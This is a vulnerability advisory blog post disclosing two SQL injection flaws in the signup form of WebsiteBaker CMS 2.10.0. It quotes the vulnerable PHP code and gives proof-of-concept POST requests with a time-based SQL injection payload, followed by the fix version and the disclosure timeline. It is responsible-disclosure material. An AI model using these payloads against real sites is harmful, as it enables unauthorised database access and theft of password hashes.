WebsiteBaker CMS 2.10.0 – Multiple SQL Injection Vulnerabilities

blog | 28 Jan 2018 | Citadelo

Overview

WebsiteBaker 2.10.0 and lower versions are vulnerable to SQL injection vulnerabilities.

Background

WebsiteBaker helps you to create the website you want: A free, easy and secure, flexible and extensible open source content management system (CMS).

Details

It is possible for an unauthenticated user to inject SQL code into the variables “username” and “display_name” in the “account/signup.php” PHP script (signup form). The vulnerability exists due to insufficient filtration of user-supplied data. By exploiting this vulnerability, an attacker gains access to all records stored in the database with the privileges of the WebsiteBaker database user (e.g. administrator password MD5 hash).

Vulnerable code:
account/signup2.php

$username = strtolower(strip_tags($wb-&gt;get_post('username'))); &lt;-- <strong>vstup od užívateľa</strong>
$display_name = strip_tags($wb-&gt;get_post('display_name')); &lt;-- <strong>vstup od užívateľa</strong>
...
// Check if username already exists
$sql = 'SELECT `user_id` FROM `'.TABLE_PREFIX.'users` WHERE `username` = \''.$username.'\''; &lt;-- <strong>SQL injection č.1</strong>
if ($database-&gt;get_one($sql)) {
53     $error[] = $MESSAGE['USERS_USERNAME_TAKEN']."\n";
}
if(!preg_match('/^[a-z]{1}[a-z0-9_-]{2,}$/i', $username)) {
56    $error[] =  $MESSAGE['USERS_NAME_INVALID_CHARS']."\n";
}
$sql  = 'SELECT COUNT(*) FROM `'.TABLE_PREFIX.'users` ';
$sql .= 'WHERE  `display_name` LIKE \''.$display_name.'\''; &lt;-- <strong>SQL injection č.2</strong>
if ($database-&gt;get_one($sql) &gt; 0) {
61     $error[] = $MESSAGE['USERS_DISPLAYNAME_TAKEN'].'';

The POST parameters “username” (line 40) and “display_name” (line 41) are used unsanitized in function “get_one” (line 52 and 60) for SQL queries. No prepared statements or escaping is used.

framework/class.database.php

102    // Gets the first column of the first row
103    function get_one( $statement )
104    {
105        $fetch_row = mysqli_fetch_array(mysqli_query($this-&gt;db_handle, $statement) );
106        $result = $fetch_row[0];
107        $this-&gt;set_error(null);
108        if(mysqli_error($this-&gt;db_handle)) {
109            $this-&gt;set_error(mysqli_error($this-&gt;db_handle));
110            return null;
111        } else {
112            return $result;
113        }
114    }

Proof of concept

SQL Injection no.1: parameter username

Payload: sql’ OR SLEEP(5)–

POST /account/signup.php HTTP/1.1
Host: localhost
Cookie: wb-5016-sid=7e753a5q6lpfp8fh24ppo9vm70
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 184

action=send&redirect=http%3A%2F%2Flocalhost&submitted_when=1490134734&email-address=&name=&full_name=username=sql' OR SLEEP(5)-- &display_name=testemail=testcaptcha=submit=Sign-up

The response will have a delay 5 seconds.

SQL Injection no.2: parameter display_name

Payload: sql’ OR SLEEP(5)–

POST /account/signup.php HTTP/1.1
Host: localhost
Cookie: wb-5016-sid=7e753a5q6lpfp8fh24ppo9vm70
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 184

action=send&amp;redirect=http%3A%2F%2Flocalhost&amp;submitted_when=1490134833&amp;email-address=&amp;name=&amp;full_name=&amp;username=test&amp;<strong>display_name=sql' OR SLEEP(5)--</strong> &amp;email=test&amp;captcha=&amp;submit=Sign-up

The response will have a delay 5 seconds.

Solution

Update to WebsiteBaker 2.10.1 or newer version.

Report timeline

24.03.2017 Informed vendor about vulnerabilities
25.03.2017 Vendor confirms and releases fixes
03.04.2017 CVE assigned
07.04.2017 Disclosed to public

Credit

These vulnerabilities were discovered by Marek Alaksa from Citadelo.